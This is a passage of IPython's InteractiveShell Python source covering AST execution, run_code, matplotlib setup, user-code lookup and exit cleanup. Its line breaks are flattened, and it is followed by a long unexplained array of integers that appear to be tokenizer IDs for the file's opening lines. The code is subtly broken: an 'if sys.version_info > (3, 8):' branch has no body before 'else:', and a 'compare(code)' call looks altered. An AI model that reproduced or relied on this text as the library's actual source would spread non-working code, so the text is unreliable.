threw an error. It will be unregistered." % transformer) self.ast_transformers.remove(transformer) if self.ast_transformers: ast.fix_missing_locations(node) return node async def run_ast_nodes(self, nodelist:ListType[AST], cell_name:str, interactivity='last_expr', compiler=compile, result=None): """Run a sequence of AST nodes. The execution mode depends on the interactivity parameter. Parameters ---------- nodelist : list A sequence of AST nodes to run. cell_name : str Will be passed to the compiler as the filename of the cell. Typically the value returned by ip.compile.cache(cell). interactivity : str 'all', 'last', 'last_expr' , 'last_expr_or_assign' or 'none', specifying which nodes should be run interactively (displaying output from expressions). 'last_expr' will run the last node interactively only if it is an expression (i.e. expressions in loops or other blocks are not displayed) 'last_expr_or_assign' will run the last expression or the last assignment. Other values for this parameter will raise a ValueError. Experimental value: 'async' Will try to run top level interactive async/await code in default runner, this will not respect the interactivity setting and will only run the last node if it is an expression. compiler : callable A function with the same interface as the built-in compile(), to turn the AST nodes into code objects. Default is the built-in compile(). result : ExecutionResult, optional An object to store exceptions that occur during execution. Returns ------- True if an exception occurred while running code, False if it finished running. """ if not nodelist: return if interactivity == 'last_expr_or_assign': if isinstance(nodelist[-1], _assign_nodes): asg = nodelist[-1] if isinstance(asg, ast.Assign) and len(asg.targets) == 1: target = asg.targets[0] elif isinstance(asg, _single_targets_nodes): target = asg.target else: target = None if isinstance(target, ast.Name): nnode = ast.Expr(ast.Name(target.id, ast.Load())) ast.fix_missing_locations(nnode) nodelist.append(nnode) interactivity = 'last_expr' _async = False if interactivity == 'last_expr': if isinstance(nodelist[-1], ast.Expr): interactivity = "last" else: interactivity = "none" if interactivity == 'none': to_run_exec, to_run_interactive = nodelist, [] elif interactivity == 'last': to_run_exec, to_run_interactive = nodelist[:-1], nodelist[-1:] elif interactivity == 'all': to_run_exec, to_run_interactive = [], nodelist elif interactivity == 'async': to_run_exec, to_run_interactive = [], nodelist _async = True else: raise ValueError("Interactivity was %r" % interactivity) try: if _async and sys.version_info > (3,8): raise ValueError("This branch should never happen on Python 3.8 and above, " "please try to upgrade IPython and open a bug report with your case.") if _async: # If interactivity is async the semantics of run_code are # completely different Skip usual machinery. mod = Module(nodelist, []) async_wrapper_code = compiler(mod, cell_name, 'exec') exec(async_wrapper_code, self.user_global_ns, self.user_ns) async_code = removed_co_newlocals(self.user_ns.pop('async-def-wrapper')).__code__ if (await self.run_code(async_code, result, async_=True)): return True else: if sys.version_info > (3, 8): else: # refactor that to just change the mod constructor. to_run = [] for node in to_run_exec: to_run.append((node, 'exec')) for node in to_run_interactive: to_run.append((node, 'single')) for node,mode in to_run: if mode == 'exec': mod = Module([node], []) elif mode == 'single': mod = ast.Interactive([node]) with compiler.extra_flags(getattr(ast, 'PyCF_ALLOW_TOP_LEVEL_AWAIT', 0x0) if self.autoawait else 0x0): code = compiler(mod, cell_name, mode) asy = compare(code) if (await self.run_code(code, result, async_=asy)): return True # Flush softspace if softspace(sys.stdout, 0): print() except: # It's possible to have exceptions raised here, typically by # compilation of odd code (such as a naked 'return' outside a # function) that did parse but isn't valid. Typically the exception # is a SyntaxError, but it's safest just to catch anything and show # the user a traceback. # We do only one try/except outside the loop to minimize the impact # on runtime, and also because if any node in the node list is # broken, we should stop execution completely. if result: result.error_before_exec = sys.exc_info()[1] self.showtraceback() return True return False def _async_exec(self, code_obj: types.CodeType, user_ns: dict): """ Evaluate an asynchronous code object using a code runner Fake asynchronous execution of code_object in a namespace via a proxy namespace. Returns coroutine object, which can be executed via async loop runner WARNING: The semantics of `async_exec` are quite different from `exec`, in particular you can only pass a single namespace. It also return a handle to the value of the last things returned by code_object. """ return eval(code_obj, user_ns) async def run_code(self, code_obj, result=None, *, async_=False): """Execute a code object. When an exception occurs, self.showtraceback() is called to display a traceback. Parameters ---------- code_obj : code object A compiled code object, to be executed result : ExecutionResult, optional An object to store exceptions that occur during execution. async_ : Bool (Experimental) Attempt to run top-level asynchronous code in a default loop. Returns ------- False : successful execution. True : an error occurred. """ # special value to say that anything above is IPython and should be # hidden. __tracebackhide__ = "__ipython_bottom__" # Set our own excepthook in case the user code tries to call it # directly, so that the IPython crash handler doesn't get triggered old_excepthook, sys.excepthook = sys.excepthook, self.excepthook # we save the original sys.excepthook in the instance, in case config # code (such as magics) needs access to it. self.sys_excepthook = old_excepthook outflag = True # happens in more places, so it's easier as default try: try: self.hooks.pre_run_code_hook() if async_ and sys.version_info < (3,8): last_expr = (await self._async_exec(code_obj, self.user_ns)) code = compile('last_expr', 'fake', "single") exec(code, {'last_expr': last_expr}) elif async_ : await eval(code_obj, self.user_global_ns, self.user_ns) else: exec(code_obj, self.user_global_ns, self.user_ns) finally: # Reset our crash handler in place sys.excepthook = old_excepthook except SystemExit as e: if result is not None: result.error_in_exec = e self.showtraceback(exception_only=True) warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1) except self.custom_exceptions: etype, value, tb = sys.exc_info() if result is not None: result.error_in_exec = value self.CustomTB(etype, value, tb) except: if result is not None: result.error_in_exec = sys.exc_info()[1] self.showtraceback(running_compiled_code=True) else: outflag = False return outflag # For backwards compatibility runcode = run_code def check_complete(self, code: str) -> Tuple[str, str]: """Return whether a block of code is ready to execute, or should be continued Parameters ---------- source : string Python input code, which can be multiline. Returns ------- status : str One of 'complete', 'incomplete', or 'invalid' if source is not a prefix of valid code. indent : str When status is 'incomplete', this is some whitespace to insert on the next line of the prompt. """ status, nspaces = self.input_transformer_manager.check_complete(code) return status, ' ' * (nspaces or 0) #------------------------------------------------------------------------- # Things related to GUI support and pylab #------------------------------------------------------------------------- active_eventloop = None def enable_matplotlib(self, gui=None): """Enable interactive matplotlib and inline figure support. This takes the following steps: 1. select the appropriate eventloop and matplotlib backend 2. set up matplotlib for interactive use with that backend 3. configure formatters for inline figure display 4. enable the selected gui eventloop Parameters ---------- gui : optional, string If given, dictates the choice of matplotlib GUI backend to use (should be one of IPython's supported backends, 'qt', 'osx', 'tk', 'gtk', 'wx' or 'inline'), otherwise we use the default chosen by matplotlib (as dictated by the matplotlib build-time options plus the user's matplotlibrc configuration file). Note that not all backends make sense in all contexts, for example a terminal ipython can't display figures inline. """ from IPython.core import pylabtools as pt gui, backend = pt.find_gui_and_backend(gui, self.pylab_gui_select) if gui != 'inline': # If we have our first gui selection, store it if self.pylab_gui_select is None: self.pylab_gui_select = gui # Otherwise if they are different elif gui != self.pylab_gui_select: print('Warning: Cannot change to a different GUI toolkit: %s.' ' Using %s instead.' % (gui, self.pylab_gui_select)) gui, backend = pt.find_gui_and_backend(self.pylab_gui_select) pt.activate_matplotlib(backend) pt.configure_inline_support(self, backend) # Now we must activate the gui pylab wants to use, and fix %run to take # plot updates into account self.enable_gui(gui) self.magics_manager.registry['ExecutionMagics'].default_runner = \ pt.mpl_runner(self.safe_execfile) return gui, backend def enable_pylab(self, gui=None, import_all=True, welcome_message=False): """Activate pylab support at runtime. This turns on support for matplotlib, preloads into the interactive namespace all of numpy and pylab, and configures IPython to correctly interact with the GUI event loop. The GUI backend to be used can be optionally selected with the optional ``gui`` argument. This method only adds preloading the namespace to InteractiveShell.enable_matplotlib. Parameters ---------- gui : optional, string If given, dictates the choice of matplotlib GUI backend to use (should be one of IPython's supported backends, 'qt', 'osx', 'tk', 'gtk', 'wx' or 'inline'), otherwise we use the default chosen by matplotlib (as dictated by the matplotlib build-time options plus the user's matplotlibrc configuration file). Note that not all backends make sense in all contexts, for example a terminal ipython can't display figures inline. import_all : optional, bool, default: True Whether to do `from numpy import *` and `from pylab import *` in addition to module imports. welcome_message : deprecated This argument is ignored, no welcome message will be displayed. """ from IPython.core.pylabtools import import_pylab gui, backend = self.enable_matplotlib(gui) # We want to prevent the loading of pylab to pollute the user's # namespace as shown by the %who* magics, so we execute the activation # code in an empty namespace, and we update *both* user_ns and # user_ns_hidden with this information. ns = {} import_pylab(ns, import_all) # warn about clobbered names ignored = {"__builtins__"} both = set(ns).intersection(self.user_ns).difference(ignored) clobbered = [ name for name in both if self.user_ns[name] is not ns[name] ] self.user_ns.update(ns) self.user_ns_hidden.update(ns) return gui, backend, clobbered #------------------------------------------------------------------------- # Utilities #------------------------------------------------------------------------- def var_expand(self, cmd, depth=0, formatter=DollarFormatter()): """Expand python variables in a string. The depth argument indicates how many frames above the caller should be walked to look for the local namespace where to expand variables. The global namespace for expansion is always the user's interactive namespace. """ ns = self.user_ns.copy() try: frame = sys._getframe(depth+1) except ValueError: # This is thrown if there aren't that many frames on the stack, # e.g. if a script called run_line_magic() directly. pass else: ns.update(frame.f_locals) try: # We have to use .vformat() here, because 'self' is a valid and common # name, and expanding **ns for .format() would make it collide with # the 'self' argument of the method. cmd = formatter.vformat(cmd, args=[], kwargs=ns) except Exception: # if formatter couldn't format, just let it go untransformed pass return cmd def mktempfile(self, data=None, prefix='ipython_edit_'): """Make a new tempfile and return its filename. This makes a call to tempfile.mkstemp (created in a tempfile.mkdtemp), but it registers the created filename internally so ipython cleans it up at exit time. Optional inputs: - data(None): if data is given, it gets written out to the temp file immediately, and the file is closed again.""" dirname = tempfile.mkdtemp(prefix=prefix) self.tempdirs.append(dirname) handle, filename = tempfile.mkstemp('.py', prefix, dir=dirname) os.close(handle) # On Windows, there can only be one open handle on a file self.tempfiles.append(filename) if data: with open(filename, 'w') as tmp_file: tmp_file.write(data) return filename @undoc def write(self,data): """DEPRECATED: Write a string to the default output""" warn('InteractiveShell.write() is deprecated, use sys.stdout instead', DeprecationWarning, stacklevel=2) sys.stdout.write(data) @undoc def write_err(self,data): """DEPRECATED: Write a string to the default error output""" warn('InteractiveShell.write_err() is deprecated, use sys.stderr instead', DeprecationWarning, stacklevel=2) sys.stderr.write(data) def show_usage(self): """Show a usage message""" page.page(IPython.core.usage.interactive_usage) def extract_input_lines(self, range_str, raw=False): """Return as a string a set of input history slices. Parameters ---------- range_str : string The set of slices is given as a string, like "~5/6-~4/2 4:8 9", since this function is for use by magic functions which get their arguments as strings. The number before the / is the session number: ~n goes n back from the current session. raw : bool, optional By default, the processed input is used. If this is true, the raw input history is used instead. Notes ----- Slices can be described with two notations: * ``N:M`` -> standard python form, means including items N...(M-1). * ``N-M`` -> include items N..M (closed endpoint). """ lines = self.history_manager.get_range_by_str(range_str, raw=raw) return "\n".join(x for _, _, x in lines) def find_user_code(self, target, raw=True, py_only=False, skip_encoding_cookie=True, search_ns=False): """Get a code string from history, file, url, or a string or macro. This is mainly used by magic functions. Parameters ---------- target : str A string specifying code to retrieve. This will be tried respectively as: ranges of input history (see %history for syntax), url, corresponding .py file, filename, or an expression evaluating to a string or Macro in the user namespace. raw : bool If true (default), retrieve raw history. Has no effect on the other retrieval mechanisms. py_only : bool (default False) Only try to fetch python code, do not try alternative methods to decode file if unicode fails. Returns ------- A string of code. ValueError is raised if nothing is found, and TypeError if it evaluates to an object of another type. In each case, .args[0] is a printable message. """ code = self.extract_input_lines(target, raw=raw) # Grab history if code: return code try: if target.startswith(('http://', 'https://')): return openpy.read_py_url(target, skip_encoding_cookie=skip_encoding_cookie) except UnicodeDecodeError: if not py_only : # Deferred import from urllib.request import urlopen response = urlopen(target) return response.read().decode('latin1') raise ValueError(("'%s' seem to be unreadable.") % target) potential_target = [target] try : potential_target.insert(0,get_py_filename(target)) except IOError: pass for tgt in potential_target : if os.path.isfile(tgt): # Read file try : return openpy.read_py_file(tgt, skip_encoding_cookie=skip_encoding_cookie) except UnicodeDecodeError : if not py_only : with io_open(tgt,'r', encoding='latin1') as f : return f.read() raise ValueError(("'%s' seem to be unreadable.") % target) elif os.path.isdir(os.path.expanduser(tgt)): raise ValueError("'%s' is a directory, not a regular file." % target) if search_ns: # Inspect namespace to load object source object_info = self.object_inspect(target, detail_level=1) if object_info['found'] and object_info['source']: return object_info['source'] try: # User namespace codeobj = eval(target, self.user_ns) except Exception: raise ValueError(("'%s' was not found in history, as a file, url, " "nor in the user namespace.") % target) if isinstance(codeobj, str): return codeobj elif isinstance(codeobj, Macro): return codeobj.value raise TypeError("%s is neither a string nor a macro." % target, codeobj) #------------------------------------------------------------------------- # Things related to IPython exiting #------------------------------------------------------------------------- def atexit_operations(self): """This will be executed at the time of exit. Cleanup operations and saving of persistent data that is done unconditionally by IPython should be performed here. For things that may depend on startup flags or platform specifics (such as having readline or not), register a separate atexit function in the code that has the appropriate information, rather than trying to clutter """ # Close the history session (this stores the end time and line count) # this must be *before* the tempfile cleanup, in case of temporary # history db self.history_manager.end_session() # Cleanup all tempfiles and folders left around for tfile in self.tempfiles: try: os.unlink(tfile) except OSError: pass for tdir in self.tempdirs: try: os.rmdir(tdir) except OSError: pass # Clear all user namespaces to release all references cleanly. self.reset(new_session=False) # Run user hooks self.hooks.shutdown_hook() # Overridden in terminal subclass to change prompts class InteractiveShellABC(metaclass=abc.ABCMeta): """An abstract base class for InteractiveShell.""" InteractiveShellABC.register(InteractiveShell)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 13383, 6101, 7535, 1398, 526, 15931, 198, 198, 2, 10097, 32501, 198, 2, 220, 15069, 357, 34, 8, 5878, 449, 962, 78, 9398, 7220, 1279, 73, 3099, 7220, 31, 89, 1416, 448, 13, 2934, 29, 198, 2, 220, 15069, 357, 34, 8, 5878, 12, 12726, 31063, 23058, 13, 1279, 69, 431, 21107, 31, 8043, 4533, 13, 15532, 29, 198, 2, 220, 15069, 357, 34, 8, 3648, 12, 9804, 220, 383, 6101, 7535, 7712, 4816, 198, 2, 198, 2, 220, 4307, 6169, 739, 262, 2846, 286, 262, 347, 10305, 13789, 13, 220, 383, 1336, 5964, 318, 287, 198, 2, 220, 262, 2393, 27975, 45761, 11, 9387, 355, 636, 286, 428, 3788, 13, 198, 2, 10097, 32501, 628, 198, 11748, 450, 66, 198, 11748, 6468, 198, 11748, 379, 37023, 198, 11748, 3170, 1040, 355, 3170, 259, 62, 4666, 198, 11748, 1257, 310, 10141, 198, 11748, 10104, 198, 11748, 28686, 198, 11748, 302, 198, 11748, 1057, 9078, 198, 11748, 25064, 198, 11748, 20218, 7753, 198, 11748, 12854, 1891, 198, 11748, 3858, 198, 11748, 850, 14681, 198, 11748, 14601, 198, 6738, 33245, 1330, 1280, 355, 33245, 62, 9654, 198, 198, 6738, 2298, 29730, 533, 1330, 12346, 293, 11649, 11012, 198, 198, 6738, 1291, 2578, 912, 13, 11250, 13, 11250, 11970, 1330, 5573, 10565, 16934, 11970, 198, 6738, 1291, 2578, 912, 13, 26791, 13, 11748, 8841, 1330, 1330, 62, 9186, 198, 6738, 6101, 7535, 13, 7295, 1330, 267, 1040, 806, 198, 6738, 6101, 7535, 13, 7295, 1330, 5536, 198, 6738, 6101, 7535, 13, 7295, 1330, 2443, 198, 6738, 6101, 7535, 13, 7295, 1330, 7694, 346, 353, 198, 6738, 6101, 7535, 13, 7295, 1330, 23212, 265, 65, 198, 6738, 6101, 7535, 13, 7295, 13, 26011, 1330, 978, 4448, 11, 978, 4448, 13511, 198, 6738, 6101, 7535, 13, 7295, 13, 2306, 420, 439, 1330, 29739, 16541, 420, 439, 198, 6738, 6101, 7535, 13, 7295, 13, 18780, 259, 62, 46670, 1330, 28477, 259, 51, 2416, 198, 6738, 6101, 7535, 13, 7295, 13, 31534, 1330, 8558, 13511, 11, 1695, 62, 31534, 198, 6738, 6101, 7535, 13, 7295, 13, 5589, 5329, 404, 1330, 327, 8103, 7293, 5329, 11, 2198, 62, 1370, 23870, 62, 541, 7535, 198, 6738, 6101, 7535, 13, 7295, 13, 24442, 1362, 1330, 350, 9945, 198, 6738, 6101, 7535, 13, 7295, 13, 13812, 62, 46670, 1330, 16531, 51, 2416, 198, 6738, 6101, 7535, 13, 7295, 13, 13812, 25480, 1330, 16531, 39, 566, 198, 6738, 6101, 7535, 13, 7295, 13, 13812, 12984, 1330, 16531, 46471, 198, 6738, 6101, 7535, 13, 7295, 13, 18224, 1330, 23412, 3041, 35408, 11, 29566, 12331, 198, 6738, 6101, 7535, 13, 7295, 13, 2302, 5736, 1330, 27995, 13511, 198, 6738, 6101, 7535, 13, 7295, 13, 18982, 1010, 1330, 16531, 8479, 1436, 198, 6738, 6101, 7535, 13, 7295, 13, 23569, 1330, 7443, 13511, 198, 6738, 6101, 7535, 13, 7295, 13, 15414, 7645, 16354, 17, 1330, 40251, 62, 45820, 2149, 11, 40251, 62, 45820, 2149, 17, 198, 6738, 6101, 7535, 13, 7295, 13, 6404, 1362, 1330, 5972, 1362, 198, 6738, 6101, 7535, 13, 7295, 13, 20285, 305, 1330, 42755, 198, 6738, 6101, 7535, 13, 7295, 13, 15577, 2220, 1330, 7119, 2220, 13511, 198, 6738, 6101, 7535, 13, 7295, 13, 3866, 24455, 1330, 3771, 24455, 13511, 198, 6738, 6101, 7535, 13, 7295, 13, 5577, 3902, 343, 1330, 13118, 35277, 198, 6738, 6101, 7535, 13, 7295, 13, 26060, 1330, 4277, 62, 3820, 1008, 198, 6738, 6101, 7535, 13, 13812, 1330, 3359, 198, 6738, 6101, 7535, 13, 33407, 13, 48267, 4598, 310, 395, 1330, 14267, 62, 4598, 310, 395, 198, 6738, 6101, 7535, 13, 26791, 1330, 9485, 10258, 1096, 198, 6738, 6101, 7535, 13, 26791, 1330, 33245, 198, 6738, 6101, 7535, 13, 26791, 1330, 12972, 18, 5589, 265, 198, 6738, 6101, 7535, 13, 26791, 1330, 1280, 9078, 198, 6738, 6101, 7535, 13, 26791, 13, 12501, 273, 2024, 1330, 3318, 420, 198, 6738, 6101, 7535, 13, 26791, 13, 952, 1330, 1265, 62, 8505, 62, 3919, 198, 6738, 6101, 7535, 13, 26791, 13, 541, 7249, 1330, 32112, 198, 6738, 6101, 7535, 13, 6978, 82, 1330, 651, 62, 541, 7535, 62, 15908, 198, 6738, 6101, 7535, 13, 26791, 13, 6978, 1330, 651, 62, 11195, 62, 15908, 11, 651, 62, 9078, 62, 34345, 11, 4155, 62, 15908, 62, 1069, 1023, 198, 6738, 6101, 7535, 13, 26791, 13, 14681, 1330, 1080, 11, 651, 22915, 198, 6738, 6101, 7535, 13, 26791, 13, 2536, 6381, 17147, 1330, 4285, 49354, 198, 6738, 6101, 7535, 13, 26791, 13, 17597, 6978, 22866, 1330, 3143, 1631, 62, 1462, 62, 17597, 6978, 198, 6738, 6101, 7535, 13, 26791, 13, 5239, 1330, 5794, 62, 9612, 11, 30948, 10100, 11, 311, 8053, 11, 29747, 8479, 1436, 198, 6738, 6101, 7535, 13, 26791, 13, 29510, 15908, 1330, 46042, 43055, 198, 6738, 1291, 2578, 912, 1330, 357, 198, 220, 220, 220, 34142, 11, 347, 970, 11, 11294, 5321, 13290, 4834, 388, 11, 2039, 388, 11, 7343, 11, 360, 713, 11, 34371, 11, 2262, 590, 11, 5994, 11, 198, 220, 220, 220, 12414, 11, 4277, 11, 26571, 11, 4377, 198, 8, 198, 6738, 14601, 1330, 9828, 198, 6738, 18931, 1330, 4049, 198, 11748, 6101, 7535, 13, 7295, 13, 25480, 82, 198, 198, 6738, 19720, 1330, 7343, 355, 7343, 6030, 11, 309, 29291, 11, 32233, 198, 6738, 6468, 1330, 29273, 198, 198, 2, 1400, 18257, 21947, 318, 39224, 11, 475, 20966, 88, 33885, 17944, 340, 422, 994, 13, 198, 2, 4091, 3740, 1378, 12567, 13, 785, 14, 541, 7535, 14, 541, 88, 33885, 14, 37165, 14, 18458, 198, 2, 357, 5304, 11, 1309, 338, 1949, 284, 4781, 621, 287, 6101, 7535, 807, 13, 15, 8, 198, 6738, 6101, 7535, 13, 26791, 13, 22866, 82, 1330, 1400, 18257, 21947, 198, 198, 28311, 25, 198, 220, 220, 220, 1330, 2205, 260, 1050, 13, 82, 746, 28413, 1958, 355, 599, 71, 87, 198, 16341, 17267, 12331, 25, 198, 220, 220, 220, 599, 20079, 87, 1958, 796, 6045, 628, 198, 4871, 43161, 282, 20361, 7, 12156, 8344, 341, 20361, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 15932, 1398, 329, 21354, 3033, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1208, 198, 198, 361, 25064, 13, 9641, 62, 10951, 1875, 357, 18, 11, 23, 2599, 198, 220, 220, 220, 422, 6468, 1330, 19937, 198, 17772, 1058, 198, 220, 220, 220, 1303, 15290, 262, 649, 7824, 11, 8856, 1218, 4578, 198, 220, 220, 220, 1303, 766, 3740, 1378, 12567, 13, 785, 14, 541, 7535, 14, 541, 7535, 14, 37165, 14, 1157, 36993, 198, 220, 220, 220, 422, 6468, 1330, 19937, 355, 13745, 26796, 198, 220, 220, 220, 19937, 796, 37456, 18666, 46331, 11, 2099, 62, 570, 2850, 25, 13745, 26796, 7, 77, 375, 46331, 8, 198, 198, 361, 25064, 13, 9641, 62, 10951, 1875, 357, 18, 11, 21, 2599, 198, 220, 220, 220, 4808, 562, 570, 62, 77, 4147, 220, 220, 220, 220, 220, 220, 220, 220, 796, 357, 459, 13, 12512, 8021, 570, 11, 6468, 13, 18858, 8021, 570, 11, 6468, 13, 8021, 570, 8, 198, 220, 220, 220, 4808, 29762, 62, 83, 853, 1039, 62, 77, 4147, 796, 357, 459, 13, 12512, 8021, 570, 11, 6468, 13, 18858, 8021, 570, 8, 198, 17772, 25, 198, 220, 220, 220, 4808, 562, 570, 62, 77, 4147, 220, 220, 220, 220, 220, 220, 220, 220, 796, 357, 459, 13, 12512, 8021, 570, 11, 6468, 13, 8021, 570, 1267, 198, 220, 220, 220, 4808, 29762, 62, 83, 853, 1039, 62, 77, 4147, 796, 357, 459, 13, 12512, 8021, 570, 11, 1267, 198, 198, 2, 10097, 32501, 198, 2, 5851, 4548, 10478, 364, 198, 2, 10097, 32501, 198, 198, 4299, 4615, 62, 1073, 62, 3605, 17946, 874, 7, 8818, 25, 19199, 13, 22203, 6030, 8, 4613, 3858, 13, 22203, 6030, 25, 198, 220, 220, 220, 37227, 13615, 257, 2163, 326, 466, 407, 2251, 257, 649, 1957, 8354, 13, 220, 628, 220, 220, 220, 11259, 257, 2163, 11, 2251, 257, 17271, 286, 428, 2163, 810, 262, 763, 62, 3605, 12001, 6056, 198, 220, 220, 220, 468, 587, 4615, 11, 1642, 428, 2163, 2438, 1682, 1057, 287, 262, 11348, 9969, 198, 220, 220, 220, 8354, 13, 220, 628, 220, 220, 220, 775, 761, 428, 287, 1502, 284, 1057, 39354, 2438, 287, 2836, 1241, 25745, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 422, 3858, 1330, 6127, 6030, 11, 15553, 6030, 198, 220, 220, 220, 7375, 62, 13965, 29701, 23333, 796, 657, 87, 34215, 198, 220, 220, 220, 2438, 796, 2163, 13, 834, 8189, 834, 198, 220, 220, 220, 649, 62, 1073, 62, 33152, 796, 2438, 13, 1073, 62, 33152, 1222, 5299, 8220, 62, 13965, 29701, 23333, 198, 220, 220, 220, 611, 25064, 13, 9641, 62, 10951, 1875, 357, 18, 11, 807, 11, 657, 11, 705, 26591, 3256, 513, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 649, 62, 8189, 796, 2438, 13, 33491, 7, 1073, 62, 33152, 28, 3605, 62, 1073, 62, 33152, 8, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 649, 62, 8189, 796, 6127, 6030, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 853, 9127, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 46265, 8807, 853, 9127, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 77, 17946, 874, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 301, 4595, 1096, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 649, 62, 1073, 62, 33152, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 8189, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 1102, 6448, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 14933, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 85, 1501, 1047, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 34345, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 3672, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 11085, 2815, 23397, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 75, 1662, 397, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 5787, 85, 945, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 13, 1073, 62, 3846, 85, 945, 198, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 1441, 15553, 6030, 7, 3605, 62, 8189, 11, 15095, 874, 22784, 2163, 13, 834, 3672, 834, 11, 2163, 13, 834, 12286, 82, 834, 8, 628, 198, 2, 356, 991, 761, 284, 1057, 1243, 1262, 262, 30351, 952, 1785, 26268, 11, 475, 612, 318, 645, 198, 2, 30351, 11812, 198, 6738, 764, 292, 13361, 62, 16794, 364, 1330, 44104, 292, 13361, 952, 62, 16737, 11, 220, 4808, 292, 13361, 1958, 11, 4808, 7752, 12003, 62, 27261, 62, 16737, 8, 198, 6738, 764, 292, 13361, 62, 16794, 364, 1330, 4808, 22019, 952, 62, 16737, 11, 4808, 83, 27250, 62, 16737, 11, 4808, 21754, 62, 1350, 62, 292, 13361, 628, 198, 4299, 4808, 459, 62, 292, 13361, 1958, 7, 3846, 25, 2536, 11, 29908, 62, 3672, 25, 2536, 8, 4613, 6468, 13, 26796, 25, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2547, 325, 257, 2685, 351, 1353, 12, 5715, 25507, 290, 13096, 262, 29273, 284, 307, 1498, 284, 1057, 340, 1568, 13, 628, 220, 220, 220, 25139, 2357, 198, 220, 220, 220, 45337, 628, 220, 220, 220, 2685, 25, 965, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2438, 2685, 284, 30351, 1313, 1958, 198, 220, 220, 220, 29908, 62, 3672, 25, 965, 198, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 2163, 284, 307, 973, 284, 14441, 262, 3804, 4600, 3846, 44646, 632, 318, 198, 220, 220, 220, 220, 220, 220, 220, 13030, 284, 12429, 1662, 1174, 779, 257, 21015, 27421, 287, 1502, 284, 407, 3278, 1133, 262, 198, 220, 220, 220, 220, 220, 220, 220, 3298, 25745, 287, 543, 262, 2163, 481, 307, 4966, 13, 628, 220, 220, 220, 8229, 198, 220, 220, 220, 40103, 628, 220, 220, 220, 317, 8265, 2134, 29273, 7268, 12429, 505, 1174, 2163, 3706, 4600, 48553, 62, 3672, 44646, 628, 220, 220, 220, 383, 1813, 2438, 318, 12908, 287, 257, 30351, 12, 4299, 2163, 11, 44267, 656, 281, 29273, 11, 290, 198, 220, 220, 220, 262, 7186, 2163, 6770, 29273, 318, 9518, 284, 1441, 262, 938, 198, 220, 220, 220, 5408, 13, 628, 220, 220, 220, 383, 938, 5408, 393, 25507, 10139, 318, 3888, 656, 257, 1441, 2643, 379, 262, 198, 220, 220, 220, 886, 286, 262, 2163, 11, 290, 4615, 422, 663, 2656, 4067, 13, 1002, 262, 938, 198, 220, 220, 220, 10139, 318, 407, 1475, 1050, 393, 5851, 4548, 2147, 318, 1760, 13, 628, 220, 220, 220, 383, 2163, 4600, 834, 8189, 834, 63, 481, 761, 284, 307, 1568, 9518, 220, 357, 1525, 198, 220, 220, 220, 7559, 2787, 2668, 62, 1073, 62, 3605, 17946, 874, 15506, 8, 287, 257, 8840, 2239, 284, 407, 2251, 649, 4600, 17946, 874, 3419, 63, 198, 220, 220, 220, 3616, 326, 262, 1957, 290, 3298, 8354, 389, 262, 976, 11, 37941, 355, 611, 262, 1767, 286, 198, 220, 220, 220, 262, 2163, 373, 379, 8265, 1241, 13, 628, 220, 220, 220, 36778, 257, 869, 284, 4600, 17946, 874, 3419, 63, 318, 925, 655, 878, 262, 938, 5408, 286, 262, 198, 220, 220, 220, 2163, 11, 393, 655, 706, 262, 938, 16237, 393, 2643, 284, 787, 1654, 262, 198, 220, 220, 220, 3298, 8633, 318, 6153, 355, 21015, 2163, 670, 351, 257, 1957, 3049, 12940, 543, 198, 220, 220, 220, 318, 6153, 691, 319, 4600, 12001, 3419, 63, 3848, 13, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 422, 6468, 1330, 1475, 1050, 11, 5851, 4548, 11, 8229, 198, 220, 220, 220, 611, 25064, 13, 9641, 62, 10951, 18189, 357, 18, 11, 23, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 6468, 13, 29572, 7, 3846, 8, 198, 220, 220, 220, 5509, 796, 6468, 13, 29572, 28264, 292, 13361, 1958, 7, 3846, 4008, 628, 220, 220, 220, 2163, 62, 4299, 796, 5509, 13, 2618, 58, 15, 60, 198, 220, 220, 220, 2163, 62, 4299, 13, 3672, 796, 29908, 62, 3672, 198, 220, 220, 220, 1949, 62, 9967, 796, 2163, 62, 4299, 13, 2618, 58, 15, 60, 198, 220, 220, 220, 938, 31937, 796, 1949, 62, 9967, 13, 2618, 58, 12, 16, 60, 198, 220, 220, 220, 611, 318, 39098, 7, 12957, 31937, 11, 357, 3109, 1050, 11, 5851, 4548, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 62, 